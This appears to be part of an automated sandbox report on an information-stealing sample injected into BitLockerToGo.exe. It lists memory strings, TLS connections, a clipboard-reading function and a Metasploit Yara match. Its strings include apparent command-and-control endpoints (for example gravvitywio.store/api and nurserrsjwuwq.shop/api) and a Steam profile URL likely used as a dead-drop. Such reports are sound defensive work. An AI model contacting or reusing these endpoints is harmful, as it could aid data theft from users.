Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store/
Source: BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365814090.0000000003124000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store/api
Source: BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gravvitywio.store/api.Op
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: BitLockerToGo.exe, 00000002.00000002.2588464715.0000000003088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nurserrsjwuwq.shop/:
Source: BitLockerToGo.exe, 00000002.00000002.2588464715.000000000309D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nurserrsjwuwq.shop/api
Source: BitLockerToGo.exe, 00000002.00000003.2288076876.00000000030C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nurserrsjwuwq.shop/api4
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: klFMCT64RF.exe	String found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictpkcs7:
Source: BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://questionsmw.store/
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soldiefieop.site/
Source: BitLockerToGo.exe, 00000002.00000003.2287992372.00000000030E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soldiefieop.site/api.Op
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2589207025.000000000313F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365876460.0000000003121000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.0000000003124000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.0000000003124000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
Source: BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2366125324.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: BitLockerToGo.exe, 00000002.00000003.2365814090.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365915421.0000000003142000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: BitLockerToGo.exe, 00000002.00000002.2588464715.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2365955570.00000000030C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://treatynreit.site/apirO
Source: klFMCT64RF.exe	String found in binary or memory: https://www.certum.pl/CPS0
Source: klFMCT64RF.exe	String found in binary or memory: https://www.globalsign.com/repository/0
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: BitLockerToGo.exe, 00000002.00000003.2365789306.0000000003146000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: BitLockerToGo.exe, 00000002.00000002.2588744955.0000000003125000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.150:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.18:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.183.74:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.193:443 -> 192.168.2.5:49725 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_0043BE60 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0043BE60

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_0043BE60 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_0043BE60

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2259734292.0000000002BEC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004100A0	2_2_004100A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00401000	2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00433000	2_2_00433000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00447000	2_2_00447000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042E020	2_2_0042E020
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044F0C0	2_2_0044F0C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041C0E0	2_2_0041C0E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00425080	2_2_00425080
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00424090	2_2_00424090
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00440170	2_2_00440170
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042A120	2_2_0042A120
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00447120	2_2_00447120
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044A1D0	2_2_0044A1D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042E1F0	2_2_0042E1F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004271F0	2_2_004271F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00424190	2_2_00424190
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043A1A0	2_2_0043A1A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041D270	2_2_0041D270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040E210	2_2_0040E210
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00408230	2_2_00408230
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043F2C0	2_2_0043F2C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004092F2	2_2_004092F2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044D2A0	2_2_0044D2A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044C2A0	2_2_0044C2A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042A2AF	2_2_0042A2AF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042E2B0	2_2_0042E2B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004252B0	2_2_004252B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004012BF	2_2_004012BF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00424340	2_2_00424340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044F340	2_2_0044F340
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040134F	2_2_0040134F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00430352	2_2_00430352
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00440370	2_2_00440370
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041E310	2_2_0041E310
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043E320	2_2_0043E320
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040E330	2_2_0040E330
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040A3D0	2_2_0040A3D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041E3D0	2_2_0041E3D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043E3D0	2_2_0043E3D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004463D0	2_2_004463D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041C3F0	2_2_0041C3F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042E3F0	2_2_0042E3F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044D380	2_2_0044D380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043F460	2_2_0043F460
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00424470	2_2_00424470
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00412420	2_2_00412420
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004404C0	2_2_004404C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004464F0	2_2_004464F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041E4B0	2_2_0041E4B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043E560	2_2_0043E560
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041D500	2_2_0041D500
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00423510	2_2_00423510
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041C520	2_2_0041C520
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00401532	2_2_00401532
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042A5E8	2_2_0042A5E8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004125F0	2_2_004125F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041C5F0	2_2_0041C5F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042E590	2_2_0042E590
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042D590	2_2_0042D590
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044B590	2_2_0044B590
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040E5A0	2_2_0040E5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043F5A0	2_2_0043F5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040E640	2_2_0040E640
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043E640	2_2_0043E640
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00446660	2_2_00446660
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00403670	2_2_00403670
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044F620	2_2_0044F620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043F6D0	2_2_0043F6D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0042E6DC	2_2_0042E6DC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004246F0	2_2_004246F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041C680	2_2_0041C680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0044D680	2_2_0044D680
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040175B	2_2_0040175B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0040E700	2_2_0040E700
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00446700	2_2_00446700
